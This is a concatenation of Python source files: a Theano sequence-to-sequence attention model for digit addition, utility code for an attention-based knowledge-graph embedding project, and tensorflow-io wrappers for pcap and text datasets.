self.nh = nh
self.ne = ne
# parameters of the model
self.Wx_enc = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(ne, nh)).astype(theano.config.floatX))
self.Wx_dec = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(ne, nh)).astype(theano.config.floatX))
self.h0_enc = theano.shared(numpy.zeros((batch_size, nh), dtype=theano.config.floatX))
self.h0_dec = theano.shared(numpy.zeros((batch_size, nh), dtype=theano.config.floatX))
self.Wh_enc = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, nh)).astype(theano.config.floatX))
self.Wh_dec = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, nh)).astype(theano.config.floatX))
self.b = theano.shared(numpy.zeros(nc, dtype=theano.config.floatX))
self.W = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, nc)).astype(theano.config.floatX))
# bundle
self.params = [self.Wx_enc, self.Wx_dec, self.Wh_enc, self.Wh_dec, self.W, self.b, self.h0_enc, self.h0_dec]
if attention_type == 'dnn':
self.natt = natt
self.W_att_enc = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, natt)).astype(theano.config.floatX))
self.W_att_dec = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
(nh, natt)).astype(theano.config.floatX))
self.W_att_out = theano.shared(0.2 * numpy.random.uniform(-1.0, 1.0, \
                                                           (natt,)).astype(theano.config.floatX))
self.params += [self.W_att_enc, self.W_att_dec, self.W_att_out]
idxs_enc, idxs_dec = T.imatrix(), T.imatrix()
y = T.imatrix()
# shape (batch, seq, dim)
x_enc, x_dec = self.Wx_enc[idxs_enc], self.Wx_dec[idxs_dec]
# compute the encoder representation
def recurrence(x_t, h_tm1):
h_t = T.nnet.sigmoid(x_t + T.dot(h_tm1, self.Wh_enc))
return [h_t, h_t]
[h, s], _ = theano.scan(fn=recurrence, \
sequences=x_enc.dimshuffle(1, 0, 2), \
outputs_info=[self.h0_enc, None])
h_enc_last = h[-1, :]
# shape of h: (seq, batch, dim)
# No attention : return the last element of h_enc
def no_attention(h_enc, h_tm1):
return h_enc[-1, :]
# Simple MemNN style attention = similarity between h_enc and h_tm1
def attention_function_dot(h_enc, h_tm1):
attention_vector = T.nnet.softmax(T.dot(h_enc, h_tm1))
return (attention_vector.T * h_enc).sum(axis=0)
# TODO Attention computed with an NN (1 hidden layer for states mixing)
def attention_function_dnn(h_enc, h_tm1):
attn_hid = T.tanh(T.dot(h_enc, self.W_att_enc) + T.dot(h_tm1, self.W_att_dec))
attention_vector = T.nnet.softmax(T.dot(attn_hid, self.W_att_out.T))
return (attention_vector.T * h_enc).sum(axis=0)
if attention_type == 'dnn':
attention = attention_function_dnn
elif attention_type == 'dot':
attention = attention_function_dot
else:
attention = no_attention
# from the encoder representation, generate the sequence
def recurrence(x_t, h_tm1):
h_t = T.nnet.sigmoid(x_t + T.dot(h_tm1, self.Wh_dec) + attention(h, h_tm1))
s_t = T.nnet.softmax(T.dot(h_t, self.W) + self.b)
return [h_t, s_t]
[h_dec, s_dec], _ = theano.scan(fn=recurrence, \
sequences=x_dec.dimshuffle(1, 0, 2),
outputs_info=[self.h0_dec, None])
probas = s_dec.dimshuffle(1, 0, 2)
y_pred = T.argmax(probas, axis=2)
self.classify = theano.function(inputs=[idxs_enc, idxs_dec], outputs=y_pred)
self.debug = theano.function(inputs=[idxs_enc, idxs_dec, y],
outputs=[idxs_enc.shape, y.shape, x_enc.shape, h.shape, h_enc_last.shape,
h_dec.shape, s_dec.shape, probas.shape, y_pred.shape])
# cost and gradients and learning rate
lr = T.scalar('lr')
        # nll = -T.mean(T.log(probas)[T.arange(y.shape[0]), y])
        # nll = -T.mean(y * T.log(probas)+ (1.- y) * T.log(1. - probas))
        # `nll` was left undefined here; use a standard categorical NLL over the
        # flattened (batch * time) predictions so the gradient below is well-formed.
        flat_probas = probas.reshape((probas.shape[0] * probas.shape[1], probas.shape[2]))
        nll = -T.mean(T.log(flat_probas)[T.arange(y.flatten().shape[0]), y.flatten()])
        gradients = T.grad(nll, self.params)
updates = OrderedDict((p, p - lr * g) for p, g in zip(self.params, gradients))
# theano functions
self.train = theano.function([idxs_enc, idxs_dec, y, lr], nll, updates=updates)
# generation part
h_tm1 = T.vector()
idxs_dec = T.iscalar()
h_t = T.nnet.sigmoid(self.Wx_dec[idxs_dec] + T.dot(h_tm1, self.Wh_dec) + attention(h, h_tm1))
s_t = T.nnet.softmax(T.dot(h_t, self.W) + self.b)
self.compute_h_enc = theano.function([idxs_enc], h)
self.generate_step = theano.function(inputs=[h_tm1, h, idxs_dec], outputs=[h_t, s_t])
def generate_text(self, idxs_enc, max_len=10):
h_T = self.compute_h_enc(idxs_enc)
cur_dec_idx = -1
y_pred = []
for i in range(max_len):
if i == 0:
h_tm1 = self.h0_dec.get_value()
h_tm1, probas = self.generate_step(h_tm1, h_T, cur_dec_idx)
# sample given the multinomial
cur_dec_idx = np.argwhere(numpy.random.multinomial(1, probas[0]) == 1)[0][0]
y_pred += [cur_dec_idx]
if cur_dec_idx == len(probas[0]) - 1:
# we sampled <EOS>
break
return y_pred
def preprocess(x, y):
# x, y = filter(lambda z: z != 0, x), filter(lambda z: z != 0, y)
sentence_enc = np.array(x).astype('int32')
sentence_dec = np.array([0] + y).astype('int32') - 1 # trick with 1-based indexing
target = np.array(y + [0]).astype('int32') - 1 # same
return sentence_enc, sentence_dec, target
def main(nsamples=10000,
n_hidden=128,
lr=0.01,
nepochs=100,
batch_size=64,
val_freq=1):
INVERT = False
DIGITS = 3
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+ '
n_classes = len('0123456789') + 1 # add <eos>
voc_size = len('0123456789+') + 1 # add <bos> for the decoder
# generate the dataset
ctable = CharacterTable(chars, MAXLEN)
X_train, X_val, y_train, y_val = generate_train_data(nsamples)
# build the model
m = model(nh=n_hidden,
nc=n_classes,
ne=voc_size,
batch_size=batch_size,
natt=20)
b_sentence_enc = np.zeros((batch_size, MAXLEN)).astype('int32')
b_sentence_dec = np.zeros((batch_size, DIGITS + 2)).astype('int32')
b_target = np.zeros((batch_size, DIGITS + 2)).astype('int32')
print(m.debug(b_sentence_enc, b_sentence_dec, b_target))
# training
for epoch in range(nepochs):
nlls = []
for batch_num in range(len(X_train) / batch_size):
b_sentence_enc = np.zeros((batch_size, MAXLEN)).astype('int32')
b_sentence_dec = np.zeros((batch_size, DIGITS + 1)).astype('int32')
b_target = np.zeros((batch_size, DIGITS + 1)).astype('int32')
for i in range(batch_size):
x, y = X_train[batch_num * batch_size + i], y_train[batch_num * batch_size + i]
sentence_enc, sentence_dec, target = preprocess(x, y)
b_sentence_enc[i,] = sentence_enc
b_sentence_dec[i,] = sentence_dec
b_target[i,] = target
nlls += [m.train(b_sentence_enc, b_sentence_dec, b_target, lr)]
print "%.2f %% completedi - nll = %.2f\r" % ((i + 1) * 100. / len(X_train), np.mean(nlls)),
sys.stdout.flush()
print
# evaluation
if (epoch + 1) % val_freq == 0:
for i, (x, y) in enumerate(zip(X_val, y_val)):
sentence_enc, sentence_dec, target = preprocess(x, y)
y_pred = m.generate_text(sentence_enc)
try:
print "ground-truth\t", np.concatenate([[sentence_dec[1]], target[:-1]])
print "predicted \t", y_pred
except IndexError:
pass
if i > 5:
break
if __name__ == "__main__":
main()
```
#### File: Attn-KGE/LSTM_fix/tmp_test.py
```python
# import numpy as np
#
# x = np.arange(60).reshape((3,4,5))
# mask = np.ones((3,4))
# mask[2][3] = 0
# mask[1][3] = 0
#
# W = np.ones((5,5))
# U = np.ones((5,5))
# rel = np.ones((5,))
#
#
# pctx = tensor.dot(state_below, tparams[_p(prefix, 'W')]) + tensor.dot(rel, tparams[_p(prefix, 'U')]) + tparams[
# _p(prefix, 'b')]
#
#
# pctx_ = tensor.tanh(pctx)
#
#
# # seq, batch, dim *
# # alpha = 97,16,256 * 256, = 97,16
# alpha = tensor.dot(pctx_, tparams[_p(prefix, 'V')])
# alpha = tensor.exp(alpha)
# alpha = alpha * mask
# alpha = alpha / theano.tensor.sum(alpha, axis=0, keepdims=True)
# # alpha.sum(axis=0)
# # h = emb * alpha[:, :, None]
# # h = tensor.dot(state_below,alpha)
# # h = state_below * alpha[:, :, None]
# # alpha
# state = alpha[:, :, None] * state_below
# # proj = (h * mask[:, :, None]).sum(axis=0)
# # proj = proj / mask.sum(axis=0)[:, None]
# # proj = tensor.tanh(tensor.dot(proj, tparams[_p(prefix, 'O')]))
#
# # h is 97,16,128
#
# # def _step(m_, x_, h_):
# # h = m_[:, None] * x_ + (1. - m_)[:, None] * h_
# # return h
# #
# # rval, updates = theano.scan(_step,
# # sequences=[mask, state],
# # outputs_info=[tensor.alloc(numpy_floatX(0.),
# # n_samples,
# # options['edim'])],
# # name='attention_mask')
# # return rval[-1]
# proj = (state * mask[:, :, None]).sum(axis=0)
# proj = proj / mask.sum(axis=0)[:, None]
# return proj
#
```
#### File: Attn-KGE/LSTM_fix/util.py
```python
__author__ = 'jcxu'
from collections import OrderedDict
import theano
import theano.tensor as tensor
import numpy
import cPickle as pkl
import sys
import time
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from theano import config
import cPickle
# make prefix-appended name
def _p(pp, name):
return '%s_%s' % (pp, name)
def my_hash(option, h, l, r):
return h * (option['ent_num'] ** 2) + l * option['ent_num'] + r
def prepare_test_data(new_seq, maxlen=None):
lengths = [len(seq) for seq in new_seq]
n_samples = len(new_seq)
if maxlen is None:
maxlen = numpy.max(lengths)
for i, seq in enumerate(new_seq):
lengths[i] = numpy.minimum(maxlen, lengths[i])
x = numpy.zeros((maxlen, n_samples), dtype='int64')
x_mask = numpy.zeros((maxlen, n_samples), dtype='float32')
# x_mask = numpy.zeros((maxlen, n_samples),dtype='int64')
for idx, s in enumerate(new_seq):
x[:lengths[idx], idx] = s[:lengths[idx]]
x_mask[:lengths[idx], idx] = 1.
x_mask[0] = 1.
return x, x_mask
def prepare_data(seqs, maxlen=None):
"""Create the matrices from the datasets.
@param seqs: a list. shape = (batch_size, 4, seq_len)
This pad each sequence to the same length: the lenght of the
longest sequence or maxlen.
if maxlen is set, we will cut all sequence to this maximum
lenght.
This swap the axis!
"""
# x: a list of sentences
new_seq = []
    for i in range(4):  # one column block per entity text (h, t, h', t'), matching the (batch_size, 4, seq_len) layout above
for seq in xrange(len(seqs)):
new_seq.append(seqs[seq][i])
# new_seq: shape = (seq_len , batch_size * 4)]
lengths = [len(seq) for seq in new_seq]
n_samples = len(new_seq)
if maxlen is None:
maxlen = numpy.max(lengths)
for i, seq in enumerate(new_seq):
lengths[i] = numpy.minimum(maxlen, lengths[i])
x = numpy.zeros((maxlen, n_samples)).astype('int64')
x_mask = numpy.zeros((maxlen, n_samples)).astype(theano.config.floatX)
# x_mask = numpy.zeros((maxlen, n_samples),dtype='int64')
for idx, s in enumerate(new_seq):
x[:lengths[idx], idx] = s[:lengths[idx]]
x_mask[:lengths[idx], idx] = 1.
x_mask[0] = 1.
return x, x_mask
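# Worked example (illustrative): padding the token-id sequences [3, 4, 5] and [7]
# the way prepare_test_data / prepare_data do gives one column per sequence:
#
#     x      = [[3, 7],       x_mask = [[1., 1.],
#               [4, 0],                 [1., 0.],
#               [5, 0]]                 [1., 0.]]
#
# i.e. shape (max_len, n_samples); the mask marks real tokens so padded positions
# are ignored when the LSTM/CBOW states are pooled.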
def neg_sample(options, size, samples, train_or_valid='valid'):
"""
@param size: samples needed
@param samples: which sample train/valid/test
#param train_or_valid: a string. 'train' or 'valid'
@return: [h, l, h', l', r, r'] means: [pos_sample, neg_sample]
"""
result = []
# for s in xrange(size / 2):
for s in xrange(size):
i = numpy.random.randint(0, len(samples))
j = numpy.random.randint(0, options['ent_num'])
k = numpy.random.randint(0, options['rel_num'])
h, l, r = samples[i][:]
pr = 1000 * options[train_or_valid + '_right_num'][r] / (
options[train_or_valid + '_right_num'][r] + options[train_or_valid + '_left_num'][r])
if options['method'] == 0:
pr = 500
if numpy.random.randint(0, 1000) < pr:
# while triple_count.has_key(h) and triple_count[h].has_key(r) and triple_count[h][r].has_key(j):
while options[train_or_valid + '_triple_exist'].has_key(my_hash(options, h, j, r)):
j = numpy.random.randint(0, options['ent_num'])
result.append([h, l, h, j, r, r])
else:
# while triple_count.has_key(j) and triple_count[h].has_key(r) and triple_count[j][r].has_key(l):
while options[train_or_valid + '_triple_exist'].has_key(my_hash(options, j, l, r)):
j = numpy.random.randint(0, options['ent_num'])
result.append([h, l, j, l, r, r])
# while options[train_or_valid + '_triple_exist'].has_key(my_hash(options, h, l, k)):
# k = numpy.random.randint(0, options['rel_num'])
# result.append([h, l, h, l, r, k])
x, x_mask = prepare_data([[options['texts'][result[s][i]] for i in xrange(4)] for s in xrange(size)],
maxlen=options['max_len'])
return numpy.array(result), x, x_mask
def generate_test_text(tparams, options, f_test, epo_num, ttparams=None, build_test=None):
"""
With ATT: options['build_test'] = build_test
build_test util:
build_test(tparams, options, ttparams=None, relation_vec=True)
relation_vec means that relation is a vector, otherwise a matrix.
Without Att, with gate: options['test_text_embedding'] = test_text_embedding options['alpha'] = alpha
Without Att and gate: options['test_text_embedding'] = test_text_embedding
:param tparams:
:param options:
:param f_test:
:param epo_num:
:param ttparams:
:param build_test: Optional
:return:
"""
if ttparams == None:
ttparams = tparams
model_name, max_len = options['model_name'], options['max_len']
# if model_name == 'lstm' or model_name == 'blstm' or model_name == 'cbow'\
# or model_name=='lstm_gate' or model_name == 'lstm_gate_pro'\
# or model_name=='cbow_gate' or model_name=='cbow_gate_pro':
# t_text, t_mask = prepare_test_data(options['texts'], max_len)
# test_text_embedding = f_test(t_text, t_mask)[0]
# if (options['model_name'].find('att') != -1) and (options['data'].find('fb') != -1):
# test_num = len(options['test_samples'])
# x_left, x_mask_left = prepare_test_data(
# [options['texts'][options['test_samples'][s][0]] for s in xrange(test_num)],
# maxlen=options['max_len'])
#
# x_right, x_mask_right = prepare_test_data(
# [options['texts'][options['test_samples'][s][1]] for s in xrange(test_num)],
# maxlen=options['max_len'])
# assert len(numpy.sum(x_mask_left, axis=0).nonzero()[0]) == x_mask_left.shape[1]
# print 'Pass assertion test'
#
# relation_emb = ttparams['rel_emb'].get_value()
# rel_needed = [relation_emb[options['test_samples'][s][2]] for s in xrange(test_num)]
#
# left_test_text_embedding, __ = f_test(x_left, x_mask_left, rel_needed)
# right_test_text_embedding, __ = f_test(x_right, x_mask_right, rel_needed)
# options['test_text_embedding'] = [left_test_text_embedding, right_test_text_embedding]
#
# elif (options['model_name'].find('att') != -1):
# t_text, t_mask = prepare_test_data(options['texts'], max_len)
#
# # check zeros mask
# assert len(numpy.sum(t_mask, axis=0).nonzero()[0]) == t_mask.shape[1]
# print 'Pass assertion test'
# relation_emb = ttparams['rel_emb'].get_value()
# test_text_embedding = numpy.zeros((options['rel_num'], options['ent_num'], options['edim']))
#
# for i in xrange(options['rel_num']):
# tmp_test_text_embedding, __ = f_test(t_text, t_mask, relation_emb[i, :].reshape((options['edim'],)))
# test_text_embedding[i] = tmp_test_text_embedding[0]
# options['test_text_embedding'] = test_text_embedding
t_text, t_mask = prepare_test_data(options['texts'], max_len)
# TODO Attention
if options['model_name'].find('att')!=-1:
# if attention, pass the test function
assert build_test != None
options['build_test'] = build_test
# gate
elif options['model_name'].find('gate') != -1:
test_text_embedding, alpha = f_test(t_text, t_mask)
options['test_text_embedding'] = test_text_embedding
options['alpha'] = alpha
else:
test_text_embedding = f_test(t_text, t_mask)
options['test_text_embedding'] = test_text_embedding
if ttparams == None:
pkl.dump([tparams, options], open('t_o_test_%s_%s' % (options['saveto'], str(epo_num)), 'wb'))
else:
pkl.dump([ttparams, tparams, options], open('test_%s_%s' % (options['saveto'], str(epo_num)), 'wb'))
def max_norm(p, options):
s = numpy.square(p)
s_ = s.sum(axis=1, keepdims=True)
norms = numpy.sqrt(s_)
desired = numpy.clip(norms, 0, options['norm'])
return p * (desired / (1e-7 + norms))
# norms = K.sqrt(K.sum(K.square(p), axis=0))
# desired = K.clip(norms, 0, self.m)
# p = p * (desired / (1e-7 + norms))
def itemlist(tparams):
return [vv for kk, vv in tparams.iteritems()]
def adadelta(lr, tparams, grads, inp, cost):
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_up2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rup2' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup+rg2up)
updir = [-tensor.sqrt(ru2 + 1e-6) / tensor.sqrt(rg2 + 1e-6) * zg
for zg, ru2, rg2 in zip(zipped_grads,
running_up2,
running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2))
for ru2, ud in zip(running_up2, updir)]
param_up = [(p, p + ud) for p, ud in zip(itemlist(tparams), updir)]
f_update = theano.function([lr], [], updates=ru2up+param_up,
on_unused_input='ignore')
return f_grad_shared, f_update
def rmsprop(lr, tparams, grads, inp, cost):
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rgup = [(rg, 0.95 * rg + 0.05 * g) for rg, g in zip(running_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup+rgup+rg2up)
updir = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_updir' % k)
for k, p in tparams.iteritems()]
updir_new = [(ud, 0.9 * ud - 1e-4 * zg / tensor.sqrt(rg2 - rg ** 2 + 1e-4))
for ud, zg, rg, rg2 in zip(updir, zipped_grads, running_grads,
running_grads2)]
param_up = [(p, p + udn[1])
for p, udn in zip(itemlist(tparams), updir_new)]
f_update = theano.function([lr], [], updates=updir_new+param_up,
on_unused_input='ignore')
return f_grad_shared, f_update
def sgd(lr, tparams, grads, inputs, cost, lr_option=0.005):
""" Stochastic Gradient Descent
:note: A more complicated version of sgd then needed. This is
done like that for adadelta and rmsprop.
"""
# New set of shared variable that will contain the gradient
# for a mini-batch.
gshared = [theano.shared(p.get_value() * 0., name='%s_grad' % k)
for k, p in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
# Function that computes gradients for a mini-batch, but do not
# updates the weights.
f_grad_shared = theano.function(inputs, cost, updates=gsup,
name='sgd_f_grad_shared')
pup = [(p, p - lr * g) for p, g in zip(tparams.values(), gshared)]
######
# idx_ent = tparams.keys().index('ent_emb')
# idx_rel = tparams.keys().index('rel_emb')
#
# tuple_ent = (tparams.get('ent_emb'), tparams.get('ent_emb') - lr_option * lr * gshared[idx_ent])
# tuple_rel = (tparams.get('rel_emb'), tparams.get('rel_emb') - lr_option * lr * gshared[idx_rel])
#
# pup[idx_ent] = tuple_ent
# pup[idx_rel] = tuple_rel
list = ['attention_W','attention_U','attention_b','attention_V']
for i in list:
idx = tparams.keys().index(i)
tuple = (tparams.get(i), tparams.get(i) - (1./lr_option) * lr * gshared[idx])
pup[idx] = tuple
######
# Function that updates the weights from the previously computed
# gradient.
f_update = theano.function([lr], [], updates=pup,
name='sgd_f_update')
return f_grad_shared, f_update
def adagrad(lr, tparams, grads, inputs, cost):
zipped_grads = [theano.shared(p.get_value() * numpy_floatX(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy_floatX(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, rg2 + g ** 2) for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inputs, cost, updates=zgup + rg2up,
name='adagrad_f_grad_shared')
updir = [-zg / tensor.sqrt(rg2 + 1e-6)
for zg, rg2 in zip(zipped_grads,
running_grads2)]
param_up = [(p, p + lr * ud) for p, ud in zip(tparams.values(), updir)]
# idx = tparams.keys().index('Wemb')
# param_up.pop(idx) # Remove the Wemb
# new_tuple = (tparams.get('Wemb'), tparams.get('Wemb') + 0.1 * updir[idx])
# param_up.append(new_tuple)
f_update = theano.function([lr], [], updates=param_up,
name='adagrad_f_update')
return f_grad_shared, f_update
def numpy_floatX(data):
return numpy.asarray(data, dtype=config.floatX)
def ortho_weight(indim, outdim=None):
if outdim is None:
W = numpy.random.uniform(low=-.05, high=.05, size=(indim, indim)).astype(config.floatX)
# W = numpy.random.uniform(
# low=-m * numpy.sqrt(6. / (indim + indim)),
# high=m * numpy.sqrt(6. / (indim + indim)),
# size=(indim, indim)).astype(config.floatX)
else:
W = numpy.random.uniform(low=-.05, high=.05, size=(indim, outdim)).astype(config.floatX)
return W
def concatenate(tensor_list, axis=0):
"""
Alternative implementation of `theano.tensor.concatenate`.
This function does exactly the same thing, but contrary to Theano's own
implementation, the gradient is implemented on the GPU.
Backpropagating through `theano.tensor.concatenate` yields slowdowns
because the inverse operation (splitting) needs to be done on the CPU.
This implementation does not have that problem.
:usage:
>>> x, y = theano.tensor.matrices('x', 'y')
>>> c = concatenate([x, y], axis=1)
:parameters:
- tensor_list : list
list of Theano tensor expressions that should be concatenated.
- axis : int
the tensors will be joined along this axis.
:returns:
- out : tensor
the concatenated tensor expression.
"""
concat_size = sum(tt.shape[axis] for tt in tensor_list)
output_shape = ()
for k in range(axis):
output_shape += (tensor_list[0].shape[k],)
output_shape += (concat_size,)
for k in range(axis + 1, tensor_list[0].ndim):
output_shape += (tensor_list[0].shape[k],)
out = tensor.zeros(output_shape)
offset = 0
for tt in tensor_list:
indices = ()
for k in range(axis):
indices += (slice(None),)
indices += (slice(offset, offset + tt.shape[axis]),)
for k in range(axis + 1, tensor_list[0].ndim):
indices += (slice(None),)
out = tensor.set_subtensor(out[indices], tt)
offset += tt.shape[axis]
return out
def load_params(path, params):
pp = numpy.load(path)
for kk, vv in params.iteritems():
if kk not in pp:
raise Warning('%s is not in the archive' % kk)
params[kk] = pp[kk]
return params
def new_load_params(path, old_params):
file = open(path, 'r')
x = cPickle.load(file)
if len(x) == 3:
pp1, pp2, opt = x
file.close()
param = old_params
if type(pp1) == type([]):
for i in xrange(len(pp1)):
kk = pp1[i].name
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp1[i].get_value()
else:
for kk in pp1:
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp1[kk]
if type(pp2) == type([]):
for i in xrange(len(pp2)):
kk = pp2[i].name
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp2[i].get_value()
else:
for kk in pp2:
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = pp2[kk]
for i in param:
print i, type(param[i])
return param
elif len(x) == 2:
par, option = x
param = old_params
for kk in par:
if param.has_key(kk) == False:
print('%s not in model, pass.' % (kk))
else:
print('Reload %s' % (kk))
param[kk] = par[kk]
for i in param:
print i, type(param[i])
return param
def init_tparams(params):
tparams = OrderedDict()
for kk, pp in params.iteritems():
try:
tparams[kk] = theano.shared(params[kk], name=kk)
except:
tparams[kk] = params[kk]
finally:
print('Load %s in ttp shape:%s\tmean:%s' % (
kk, tparams[kk].get_value().shape, tparams[kk].get_value().mean()))
return tparams
def init_tparams_fix(params):
tparams = OrderedDict()
ttparams = OrderedDict()
for kk, pp in params.iteritems():
if kk == 'ent_emb' or kk == 'rel_emb':
try:
ttparams[kk] = theano.shared(params[kk], name=kk)
except:
ttparams[kk] = params[kk]
finally:
print('Load %s in ttp shape:%s\tmean:%s' % (
kk, ttparams[kk].get_value().shape, ttparams[kk].get_value().mean()))
else:
try:
tparams[kk] = theano.shared(params[kk], name=kk)
except:
tparams[kk] = params[kk]
finally:
print('Load %s in tparam shape:%s\tmean:%s' % (
kk, tparams[kk].get_value().shape, tparams[kk].get_value().mean()))
return tparams, ttparams
def zipp(params, tparams):
"""
When we reload the model. Needed for the GPU stuff.
"""
for kk, vv in params.iteritems():
tparams[kk].set_value(vv)
def unzip(zipped):
"""
When we pickle the model. Needed for the GPU stuff.
"""
new_params = OrderedDict()
for kk, vv in zipped.iteritems():
new_params[kk] = vv.get_value()
return new_params
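# Sketch: `zipp`/`unzip` form a round trip between plain numpy parameters and the
# Theano shared variables, typically used for checkpointing, e.g.
#
#   best_p = unzip(tparams)   # snapshot the current weights as numpy arrays
#   zipp(best_p, tparams)     # restore them into the shared variables later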
def get_minibatches_idx(n, minibatch_size, shuffle=True):
"""
Used to shuffle the dataset at each iteration.
Args:
n: total length
minibatch_size: batch size
shuffle: shuffle data
Returns: zip(range(len(minibatches)), minibatches)
"""
idx_list = numpy.arange(n, dtype="int64")
if shuffle:
numpy.random.shuffle(idx_list)
minibatches = []
minibatch_start = 0
for i in range(n // minibatch_size):
minibatches.append(idx_list[minibatch_start:
minibatch_start + minibatch_size])
minibatch_start += minibatch_size
if (minibatch_start != n):
# Make a minibatch out of what is left
minibatches.append(idx_list[minibatch_start:])
return zip(range(len(minibatches)), minibatches)
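# Example sketch (hypothetical `train_x`/`train_y` containers): iterate the shuffled
# index batches returned above to slice out minibatches.
#
#   kf = get_minibatches_idx(len(train_x), minibatch_size=16, shuffle=True)
#   for _, train_index in kf:
#       x_batch = [train_x[i] for i in train_index]
#       y_batch = [train_y[i] for i in train_index]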
def dropout_layer(state_before, use_noise, trng, noise=0.5):
proj = tensor.switch(use_noise,
state_before * trng.binomial(state_before.shape, p=(1 - noise), n=1, dtype=state_before.dtype),
state_before * (1 - noise))
return proj
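# Usage sketch: `use_noise` is typically a shared flag flipped between training and
# evaluation, e.g.
#
#   use_noise = theano.shared(numpy_floatX(0.))
#   use_noise.set_value(1.)  # enable dropout while training
#   use_noise.set_value(0.)  # disable dropout at test time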
def pred_probs(f_pred_prob, prepare_data, data, iterator, verbose=False):
""" If you want to use a trained model, this is useful to compute
the probabilities of new examples.
"""
n_samples = len(data[0])
probs = numpy.zeros((n_samples, 2)).astype(config.floatX)
n_done = 0
for _, valid_index in iterator:
x, mask, y = prepare_data([data[0][t] for t in valid_index],
numpy.array(data[1])[valid_index],
maxlen=None)
pred_probs = f_pred_prob(x, mask)
probs[valid_index, :] = pred_probs
n_done += len(valid_index)
if verbose:
print '%d/%d samples classified' % (n_done, n_samples)
return probs
def pred_error(f_pred, prepare_data, data, iterator, verbose=False):
"""
Just compute the error
f_pred: Theano fct computing the prediction
prepare_data: usual prepare_data for that dataset.
"""
valid_err = 0
for _, valid_index in iterator:
x, mask, y = prepare_data([data[0][t] for t in valid_index],
numpy.array(data[1])[valid_index],
maxlen=None)
preds = f_pred(x, mask)
targets = numpy.array(data[1])[valid_index]
valid_err += (preds == targets).sum()
valid_err = 1. - numpy_floatX(valid_err) / len(data[0])
return valid_err
``` |
{
"source": "jiachengxu/io",
"score": 2
} |
#### File: python/ops/pcap_ops.py
```python
import tensorflow as tf
from tensorflow_io.core.python.ops import data_ops
from tensorflow_io.core.python.ops import _load_library
pcap_ops = _load_library('_pcap_ops.so')
class PcapDataset(data_ops.Dataset):
"""A pcap Dataset. Pcap is a popular file format for capturing network packets.
"""
def __init__(self, filenames, batch=None):
"""Create a pcap Reader.
Args:
filenames: A `tf.string` tensor containing one or more filenames.
"""
batch = 0 if batch is None else batch
dtypes = [tf.float64, tf.string]
shapes = [
tf.TensorShape([]), tf.TensorShape([])] if batch == 0 else [
tf.TensorShape([None]), tf.TensorShape([None])]
super(PcapDataset, self).__init__(
pcap_ops.pcap_dataset,
pcap_ops.pcap_input(filenames),
batch, dtypes, shapes)
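# Usage sketch (assumption: eager execution and a local capture file; "example.pcap"
# is a placeholder name, not part of this repository):
#
#   dataset = PcapDataset(["example.pcap"])
#   for timestamp, packet in dataset:
#       pass  # timestamp is a tf.float64 scalar, packet is the raw tf.string payload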
```
#### File: python/ops/text_ops.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ast
import csv
import numpy as np
import tensorflow as tf
from tensorflow_io.core.python.ops import data_ops
from tensorflow_io.core.python.ops import core_ops
def read_text(filename, **kwargs):
"""read_text"""
memory = kwargs.get("memory", "")
offset = kwargs.get("offset", 0)
length = kwargs.get("length", -1)
return core_ops.read_text(
filename, offset=offset, length=length, memory=memory)
def save_text(dataset, filename):
"""Save Dataset to disk.
Args:
dataset: A TextDataset to be saved.
filename: A `tf.string` tensor containing filename.
"""
return core_ops.text_dataset_output(dataset._variant_tensor, filename) # pylint: disable=protected-access
def save_csv(dataset, filename):
"""Save Dataset to disk.
Args:
dataset: A Dataset to be saved.
filename: A `tf.string` tensor containing filename.
"""
return core_ops.csv_dataset_output(dataset._variant_tensor, filename) # pylint: disable=protected-access
def re2_full_match(input, pattern): # pylint: disable=redefined-builtin
"""Extract regex groups
Args:
dataset: A `tf.string` tensor
pattern: A pattern string.
"""
return core_ops.re2_full_match(input, pattern)
class TextDataset(data_ops.BaseDataset):
"""A Text Dataset"""
def __init__(self, filename, **kwargs):
"""Create a Text Reader.
Args:
